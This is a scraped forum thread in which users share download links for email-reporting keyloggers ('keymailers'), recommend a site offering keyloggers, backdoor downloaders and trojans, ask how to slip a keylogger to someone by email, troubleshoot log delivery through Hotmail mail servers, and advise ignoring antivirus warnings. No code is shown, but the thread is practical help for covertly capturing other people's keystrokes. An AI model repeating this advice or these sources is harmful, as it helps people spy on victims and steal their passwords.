network monitoring
+ Reply to Thread
Page 1 of 2 12 LastLast

Thread: Get your keymailer here.

carlo Guest

Get your keymailer here.

Since people have been b***ing me for a keylogger i have uploaded one to my sever. This keylogger will send you all the keys pressed by email. You can get it [URL=http://cookielogger.t*5.com/skl0.*.zip]here[/URL]

I hope this helps.

Carlo, are you killing me?

If you use hotmail hacker gold, you will be in bad situration. What this software do is to send the target one email, saying that you are hacking him(her).

Dear [email]target@hotmail.com[/email], I have some upsetting news Someone with the email
    address [email]source@hotmail.com[/email] is trying to hack into your email account!

Explanation for keymailer

Please can someone explain me how a keymailer works, i.e after the exe file is downloaded what is to be done

Carlo
    Is there a way for someone using a Mac with Os X to send a keylogger to someone using a PC.

umm dude

Quote Originally Posted by johnnyy
    OK!!!

I need help.... I am not getting a e-mail back to me with the logs....

here is what i have also.... for info...

mx2.hotmail.com
    [email]joke280@hotmail.com[/email]

Internet Explorer- (added to list.)

It says use mx*. or mx2. for hotmail..... i tryed both and have waited a week for each of them to reply... there is no luck at all....

WHy wont it send any logs to me... i know people have it because i am testing it on my friend.... *he knows about it*...

UMmm carlo im having the same problem as that dude can u reply plz dude
    THanks

mx2

are you sure you have used mx 2 because it worked for me!
    mx2.hotmail.com
    [url]http://www.xlsite.com/password-hackers/[/url]

how long?

how long did the message take to come to u?
    and yes im postive but ill try again..

Keymailer

This is the site that skl keylogger was originally from

[url]http://www.elitec0ders.net/keylogers.htm[/url]

The keyloggers section has * good keymailers, elite keylogger has more features than skl though. The site also has some very small backdoor downloaders (some are <2kb) and some trojans, although you can find better trojans elsewhere.

Post donr use hotmail drop box

Quote Originally Posted by Chill
    UMmm carlo im having the same problem as that dude can u reply plz dude
    THanks
    Microsoft alternates between the 4 mx servers. mx2 was probably down for maintenance or blocking all unauthenticated access. Piece of advice: don’t mess with Microsoft. Don’t quote me on this but last time I checked, Gmail and Yahoo! work fine.
    - ZeroDrive

keymailer not working

whenever i download it the readme shows up nothin else.

Exclamation ???

how do u even attach a keylogger to a email
    WAFFLES?!?!? OMFG WHERE?!!?

Quote Originally Posted by mike*0*
    This is the site that skl keylogger was originally from

[url]http://www.elitec0ders.net/keylogers.htm[/url]

The keyloggers section has * good keymailers, elite keylogger has more features than skl though. The site also has some very small backdoor downloaders (some are <2kb) and some trojans, although you can find better trojans elsewhere.
    When I went to UnZip Elite Keylogger, it turned out to be a Trojan. Are the others as well?

keylogger

Quote Originally Posted by emily
    When I went to UnZip Elite Keylogger, it turned out to be a Trojan. Are the others as well?
    Of course it will be detected, it IS a trojan, all keyloggers are trojans, with the purpose of sending logged keystrokes. I don't know why people download programs that they know should be detected by antivirus, then when it is they get scared and think it will infect them or something. All trojans/keyloggers/viruses you can download will be detected, just ignore your AV.

Ok, Ive basically followed the programs instructions, installed it, and tested it. I have not recieved any emails. Ive changed the mx# from 2-4 in different tries, still no luck. Also, I click on the skl*.0 file that I had installed in a specific folder and it doesnt do anything when clicked on.

*. Is there a specific folder that I am supposed to install "Create SKL*.0 EXE" in?
    2. Does the "LOG SIZE" matter? I changed that number different times as well

Your input would be quite helpul...

Quote Originally Posted by The_Obscured
    Ok, Ive basically followed the programs instructions, installed it, and tested it. I have not recieved any emails. Ive changed the mx# from 2-4 in different tries, still no luck. Also, I click on the skl*.0 file that I had installed in a specific folder and it doesnt do anything when clicked on.

*. Is there a specific folder that I am supposed to install "Create SKL*.0 EXE" in?
    2. Does the "LOG SIZE" matter? I changed that number different times as well

Your input would be quite helpul...
    That SKL keylogger is a piece of shit. It doesn't work, and I believe elitec0ders.net has been shut down. Don't trust anything from there, because the admins and members are totally retarded.

There's some input for ya.

+ Reply to Thread